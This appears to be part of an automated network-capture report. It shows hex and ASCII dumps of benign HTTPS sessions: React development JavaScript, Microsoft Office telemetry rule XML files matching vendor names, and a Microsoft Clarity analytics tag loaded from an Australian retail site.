                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 0a 20 20 7d 0a 20 20 66 75 6e 63 74 69 6f 6e 20 72 65 67 69 73 74 65 72 44 69 72 65 63 74 45 76 65 6e 74 28 72 65 67 69 73 74 72 61 74 69 6f 6e 4e 61 6d 65 2c 20 64 65 70 65 6e 64 65 6e 63 69 65 73 29 20 7b 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 69 66 20 28 72 65 67 69 73 74 72 61 74 69 6f 6e 4e 61 6d 65 44 65 70 65 6e 64 65 6e 63 69 65 73 5b 72 65 67 69 73 74 72 61 74 69 6f 6e 4e 61 6d 65 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 65 72 72 6f 72 28 27 45 76 65 6e 74 52 65 67 69 73 74 72 79 3a 20 4d 6f 72 65 20 74 68 61 6e 20 6f 6e 65 20 70 6c 75 67 69 6e 20 61 74 74 65 6d 70 74 65 64 20 74 6f 20 70 75 62 6c 69 73 68 20 74 68 65 20 73 61 6d 65 20 27 20 2b 20 27 72 65 67 69 73 74 72 61 74 69 6f 6e 20 6e 61 6d 65 2c 20 60 25 73 60 2e 27 2c 20 72 65 67 69 73 74
                                                                                                                                    Data Ascii: } function registerDirectEvent(registrationName, dependencies) { { if (registrationNameDependencies[registrationName]) { error('EventRegistry: More than one plugin attempted to publish the same ' + 'registration name, `%s`.', regist
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 2f 2f 20 24 46 6c 6f 77 46 69 78 4d 65 20 6f 6e 6c 79 20 63 61 6c 6c 65 64 20 69 6e 20 44 45 56 2c 20 73 6f 20 76 6f 69 64 20 72 65 74 75 72 6e 20 69 73 20 6e 6f 74 20 70 6f 73 73 69 62 6c 65 2e 0a 20 20 66 75 6e 63 74 69 6f 6e 20 74 79 70 65 4e 61 6d 65 28 76 61 6c 75 65 29 20 7b 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 2f 2f 20 74 6f 53 74 72 69 6e 67 54 61 67 20 69 73 20 6e 65 65 64 65 64 20 66 6f 72 20 6e 61 6d 65 73 70 61 63 65 64 20 74 79 70 65 73 20 6c 69 6b 65 20 54 65 6d 70 6f 72 61 6c 2e 49 6e 73 74 61 6e 74 0a 20 20 20 20 20 20 76 61 72 20 68 61 73 54 6f 53 74 72 69 6e 67 54 61 67 20 3d 20 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 26 26 20 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 3b 0a 20
                                                                                                                                    Data Ascii: // $FlowFixMe only called in DEV, so void return is not possible. function typeName(value) { { // toStringTag is needed for namespaced types like Temporal.Instant var hasToStringTag = typeof Symbol === 'function' && Symbol.toStringTag;
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 6b 65 20 60 3e 3d 60 20 62 65 63 61 75 73 65 20 63 75 73 74 6f 6d 0a 20 20 20 20 2f 2f 20 6d 65 74 68 6f 64 73 20 61 72 65 20 6e 65 65 64 65 64 20 74 6f 20 70 65 72 66 6f 72 6d 20 61 63 63 75 72 61 74 65 20 61 72 69 74 68 6d 65 74 69 63 20 6f 72 20 63 6f 6d 70 61 72 69 73 6f 6e 2e 29 0a 20 20 20 20 2f 2f 0a 20 20 20 20 2f 2f 20 54 6f 20 66 69 78 20 74 68 65 20 70 72 6f 62 6c 65 6d 2c 20 63 6f 65 72 63 65 20 74 68 69 73 20 6f 62 6a 65 63 74 20 6f 72 20 73 79 6d 62 6f 6c 20 76 61 6c 75 65 20 74 6f 20 61 20 73 74 72 69 6e 67 20 62 65 66 6f 72 65 0a 20 20 20 20 2f 2f 20 70 61 73 73 69 6e 67 20 69 74 20 74 6f 20 52 65 61 63 74 2e 20 54 68 65 20 6d 6f 73 74 20 72 65 6c 69 61 62 6c 65 20 77 61 79 20 69 73 20 75 73 75 61 6c 6c 79 20 60 53 74 72 69 6e 67 28 76 61
                                                                                                                                    Data Ascii: ke `>=` because custom // methods are needed to perform accurate arithmetic or comparison.) // // To fix the problem, coerce this object or symbol value to a string before // passing it to React. The most reliable way is usually `String(va
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 25 73 2e 27 20 2b 20 27 20 54 68 69 73 20 76 61 6c 75 65 20 6d 75 73 74 20 62 65 20 63 6f 65 72 63 65 64 20 74 6f 20 61 20 73 74 72 69 6e 67 20 62 65 66 6f 72 65 20 62 65 66 6f 72 65 20 75 73 69 6e 67 20 69 74 20 68 65 72 65 2e 27 2c 20 74 79 70 65 4e 61 6d 65 28 76 61 6c 75 65 29 29 3b 0a 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 65 73 74 53 74 72 69 6e 67 43 6f 65 72 63 69 6f 6e 28 76 61 6c 75 65 29 3b 20 2f 2f 20 74 68 72 6f 77 20 28 74 6f 20 68 65 6c 70 20 63 61 6c 6c 65 72 73 20 66 69 6e 64 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 63 6f 6d 6d 65 6e 74 73 29 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 7d 0a 20 20 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 50 72 6f 70 53 74 72 69 6e 67 43 6f 65 72 63 69 6f 6e 28 76 61 6c 75 65
                                                                                                                                    Data Ascii: %s.' + ' This value must be coerced to a string before before using it here.', typeName(value)); return testStringCoercion(value); // throw (to help callers find troubleshooting comments) } } } function checkPropStringCoercion(value
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 0a 20 20 7d 0a 20 20 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 46 6f 72 6d 46 69 65 6c 64 56 61 6c 75 65 53 74 72 69 6e 67 43 6f 65 72 63 69 6f 6e 28 76 61 6c 75 65 29 20 7b 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 69 66 20 28 77 69 6c 6c 43 6f 65 72 63 69 6f 6e 54 68 72 6f 77 28 76 61 6c 75 65 29 29 20 7b 0a 20 20 20 20 20 20 20 20 65 72 72 6f 72 28 27 46 6f 72 6d 20 66 69 65 6c 64 20 76 61 6c 75 65 73 20 28 76 61 6c 75 65 2c 20 63 68 65 63 6b 65 64 2c 20 64 65 66 61 75 6c 74 56 61 6c 75 65 2c 20 6f 72 20 64 65 66 61 75 6c 74 43 68 65 63 6b 65 64 20 70 72 6f 70 73 29 27 20 2b 20 27 20 6d 75 73 74 20 62 65 20 73 74 72 69 6e 67 73 2c 20 6e 6f 74 20 25 73 2e 27 20 2b 20 27 20 54 68 69 73 20 76 61 6c 75 65 20 6d 75 73 74 20 62 65 20 63 6f 65 72 63 65 64 20 74
                                                                                                                                    Data Ascii: } function checkFormFieldValueStringCoercion(value) { { if (willCoercionThrow(value)) { error('Form field values (value, checked, defaultValue, or defaultChecked props)' + ' must be strings, not %s.' + ' This value must be coerced t


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    96192.168.2.44986313.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:22 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:22 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 471
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                    ETag: "0x8DC582B97E6FCDD"
                                                                                                                                    x-ms-request-id: d322b4d6-001e-0082-4b4d-2e5880000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080322Z-157b9fd754f2v9cjhC1SN1cryn000000041g000000003p1e
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:22 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    97192.168.2.44986213.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:22 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:22 UTC491INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:22 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 415
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                    ETag: "0x8DC582BA80D96A1"
                                                                                                                                    x-ms-request-id: 8dd7d181-c01e-0066-495f-2ea1ec000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080322Z-158dbd74bf4t6r4bhC1SN162bw00000003qg000000000v4p
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:22 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    98192.168.2.44986513.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:22 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:22 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 477
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                    ETag: "0x8DC582BA54DCC28"
                                                                                                                                    x-ms-request-id: 0b038753-501e-0016-3e53-2e181b000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080322Z-158dbd74bf4gbnjwhC1SN1gt5000000003s0000000001efc
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:22 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    99192.168.2.44986413.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:22 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:22 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 419
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                    ETag: "0x8DC582B9C710B28"
                                                                                                                                    x-ms-request-id: 94271b33-901e-0067-284a-2eb5cb000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080322Z-158dbd74bf4kd595hC1SN1av8c00000003t0000000001q59
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:22 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    100192.168.2.44987413.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:22 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:22 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 419
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                    ETag: "0x8DC582BB7F164C3"
                                                                                                                                    x-ms-request-id: c005f6c1-a01e-003d-4d3f-2e98d7000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080322Z-157b9fd754f5nn7qhC1SN19asn000000044g0000000009kp
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:22 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    101192.168.2.44987513.107.253.454435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:23 UTC525OUTGET /tag/mupsjrmw7f HTTP/1.1
                                                                                                                                    Host: www.clarity.ms
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:03:23 UTC528INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:23 GMT
                                                                                                                                    Content-Type: application/x-javascript
                                                                                                                                    Content-Length: 689
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                    Expires: -1
                                                                                                                                    Set-Cookie: CLID=a7d61f4104e24a3ab7dd66c7c8abcd4a.20241105.20251105; expires=Wed, 05 Nov 2025 08:03:23 GMT; path=/; secure; samesite=none; httponly
                                                                                                                                    Request-Context: appId=cid-v1:593e4080-f032-4d00-a652-e17f01252a9d
                                                                                                                                    x-azure-ref: 20241105T080323Z-158dbd74bf4kd595hC1SN1av8c00000003s0000000002upe
                                                                                                                                    X-Cache: CONFIG_NOCACHE
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:23 UTC689INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 61 2c 72 2c 69 2c 74 2c 79 29 7b 66 75 6e 63 74 69 6f 6e 20 73 79 6e 63 28 29 7b 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 2e 63 6c 61 72 69 74 79 2e 6d 73 2f 63 2e 67 69 66 22 7d 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 73 79 6e 63 28 29 3a 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 73 79 6e 63 29 3b 69 66 28 61 5b 63 5d 2e 76 7c 7c 61 5b 63 5d 2e 74 29 72 65 74 75 72 6e 20 61 5b 63 5d 28 22 65 76 65 6e 74 22 2c 63 2c 22 64 75 70 2e 22 2b 69 2e 70 72 6f 6a 65 63 74 49 64 29 3b 61 5b 63 5d 2e 74 3d 21 30 2c 28 74 3d 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 72 29 29 2e
                                                                                                                                    Data Ascii: !function(c,l,a,r,i,t,y){function sync(){(new Image).src="https://c.clarity.ms/c.gif"}"complete"==document.readyState?sync():window.addEventListener("load",sync);if(a[c].v||a[c].t)return a[c]("event",c,"dup."+i.projectId);a[c].t=!0,(t=l.createElement(r)).


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    102192.168.2.44988013.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:23 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:23 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 468
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                    ETag: "0x8DC582BB3EAF226"
                                                                                                                                    x-ms-request-id: 3e16ca6e-701e-0098-184d-2e395f000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080323Z-157b9fd754flfl4xhC1SN1waxc0000000490000000002q82
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:23 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    103192.168.2.44987913.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:23 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:23 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 472
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                    ETag: "0x8DC582BB650C2EC"
                                                                                                                                    x-ms-request-id: e6dbc9be-001e-0017-395c-2e0c3c000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080323Z-157b9fd754flfl4xhC1SN1waxc0000000480000000003swv
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
